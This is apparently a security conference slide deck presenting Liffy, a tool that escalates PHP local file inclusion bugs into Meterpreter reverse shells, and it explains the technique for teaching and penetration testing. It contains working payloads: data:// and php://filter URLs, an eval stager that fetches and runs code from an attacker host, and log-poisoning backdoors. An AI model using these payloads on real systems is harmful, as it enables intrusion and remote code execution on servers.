From Ashy To Classy

LFI Exploitation with Liffy

Agenda

File Inclusion Vulnerability History and OverviewLiffy IntroductionTechniquesConsiderationsFuture Development

2

#whoami

Application Security Practice Manager @VerSprite – We love product security!

I <3 Python and Java

Enterprise WebApp Background

CTF player and boot2rooter

Twitters: @rotlogix

Personal Blog: http://rotlogix.com

3

LFI History and Overview

What is it?

“The process of including files, that are already locally present on the server, through the exploiting of vulnerable inclusion procedures implemented in the application.” – https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion

Issues with include(), and require() > untrusted code evaluationExample

<?php include($_GET[‘file’]); ?> = http://target/find.php?file=/etc/passwd

<?php “files/”.include($_GET[‘file’].”.php”); ?> = Requires traversal “../../ “ and null byte %00

The problem is passing a URL parameter which is user controlled as the file argument for an include or require statement.

4

LFI History and Overview

GitHub LULZ

5

LFI History and Overview

File Inclusion Vulnerabilities have been around forever! 2002?

Around 340 “Inclusion” related entries on Exploit-DB over the last 5 years

Vulnerability dropped from OWASP Top 10 in 2010

My Opinion? Doesn’t matter.

Consider all the legacy PHP written applications, plugin development for things like Wordpress

6

Liffy Introduction

A tool that attempts to take a seemingly “read-only” LFI vulnerability into a full blown PHP Meterpreter web shell

Developed in Python

Currently has 10 features, which we will discuss

Using Python’s SimpleHTTPServer library to spawn as needed web serving for payload staging

Major enhancements added by Dan ‘unicornFurnace’ Crowley @SpiderLabs

7

Liffy Feature Overview

data:// - stream wrapper (code execution)php://input – stream wrapper (code execution)php://filter – stream wrapper (file reads)php://expect – process control extension (code execution)/proc/self/environ – CGI mode (code executionApache access log poisoning (code execution)Linux auth log poisoning (code execution)Support for absolute and relative paths (log poisoning)Support for cookiesDirect or staged payload delivery

8

Payload Generation

Leverages msfpayload

PHP Meterpreter Reverse TCP

Liffy allows you to set specify your own LHOST and LPORT for the Meterpreter

Creates corresponding resource file which loads a multi-handler

9

Direct & Staged Payloads

This simply means directly executing your payload, or using additional code to download and execute your payload through the chosen technique (data://, php://input, etc)

Staged DeliveryGenerate PHP Meterpreter through msfpayload (Stored: /tmp/{random}.php)Encode and use "<?php eval(file_get_contents(‘http://local:8000/{random}.php’))?>Spawn temporary web server to host shell out of /tmp directoryStager downloads and executes shell Listening handler catches reverse shell

Direct DeliveryGenerate PHP Meterpreter through msfpayload (Stored: /tmp/{random}.php)Read payload from stored file (/tmp/{random}.php)Encode and send directly through wrapper – data://text/html;base64,{payload}Listening handler catches reverse shell

10

Techniques: data://

RFC 2397 – data URL scheme

“ Allows the inclusion of small data items as “immediate” data, as if it had been included externally”

Stream wrapper supported since PHP 5.2.0Usage: data://text/html;base64,{encoded code here}Restricted by allow_url_include (enabled / disabled)Set in php.iniIf enabled you would potentially have an RFI as well

“ Allows the use of URL-aware file open wrappers with functions like include”

11

Techniques: data://

How do we use this?

http://target.com/lfi.php?file=data://text/html;base64, PD9waHAgc3lzdGVtKCd3aG9hbWknKTsgPz4=

<?php system(‘whoami’); ?> = PD9waHAgc3lzdGVtKCd3aG9hbWknKTsgPz4=

12

Techniques: data://

How does Liffy use this?

Non-Staged: Generate payload with msfpayload and resource fileRead payload from generated fileEncode the payloadLoad listening handler for reverse connectionsDeliver it directly data://text/html;base64, {payload}

Staged:Generate payload with msfpayload and resource fileEncode <?php eval(file_get_contents(‘http://attacker/:8000/{shell}.php’))?>Load listening handler for reverse connectionsSpawn web server to host payloadExecute

13

Techniques: data:// > DEMO!

14

Techniques: php://input

Read-only stream wrapperUsed in POST requests, allows you to read the response dataRestricted by allow_url_include Example:

15

Techniques: php://input

How does Liffy implement this technique?

Exactly the same as data://

Staged and Non-Staged Approach

Really you should always chose Non-Staged in this scenario

POST (direct delivery) = Non-Staged

16

Techniques: php://input > DEMO!

17

Techniques: SSH auth.log Poisoning

Assumes you can include the SSH auth.log

If you can there is a usually a misconfiguration issue!

The process of injecting PHP code through a failed login attempts

Code now appears in the auth.log

Include auth.log for code execution!

18

Techniques: SSH auth.log Poisoning

Assumes you can include the SSH auth.log

If you can there is a usually a misconfiguration issue!

The process of injecting PHP code through a failed login attempts

Code now appears in the auth.log

Include auth.log for code execution!

19

Techniques: SSH auth.log Poisoning

Liffy implements by creating a payload through msfpayload

Reads the PHP payload and assigns to “payload_1”

Uses <?php eval($_GET[‘code’])?> as “payload_2”

The second payload is used to poison the auth.log

The first payload is what is called after the final inclusion “&code=“

Supports path traversal sequences if needed > “../, ..\\, /../ “

20

Techniques: SSH auth.log Poisoning > DEMO!

21

Techniques: Apache access.log Poisoning

Requires being able to include the access.log, which means you might have to ../../../ (/var/log/apache2/access.log)

Poison logs through the User-Agent by injecting PHP code

Include the access.log and your PHP code get’s evaluated

22

Techniques: Apache access.log Poisoning

If the log location isn’t different (you should know this), Liffy defaults to the most common location

Supports path traversal as we already saw with the auth.log

Payload is creation is the same, but with only direct delivery

Encodes the payload in base64 and uses eval(base64_decode()); to get around double or single quotes causing parse errors

Again everything gets delivered through the User-Agent

23

Techniques: Apache access.log Poisoning > DEMO!

24

Techniques: php://filter

Wrapper that supports permitting the application of filters to a stream when you opened

Takes a resource argument, which is what you want to read

Used in conjunction with base64 encoding “Conversion Filter”

Takes the resource > streams and reads the data > converts to base64 > output is an base64 encoded string

Example:

http://target.com/vuln/lfi.php?file=php://filter/convert.base64-encode/resource=lfi.php

25

Techniques: php://filter

Liffy automates this for you!

Prompts you for a file that you want to read

Decodes the encoded string and echo's the contents back to the terminal

Useful for viewing PHP source from files you have access to

26

Techniques: php://filter > DEMO!

27

Future Work

Make the internal web server smarter and more reliable

Better Object Oriented design

Re-write the command-line interface

Dynamic request object building and re-use for everything HTTP

Support bypassing filters for path traversals

Write custom PHP reverse shell with built-in handler

28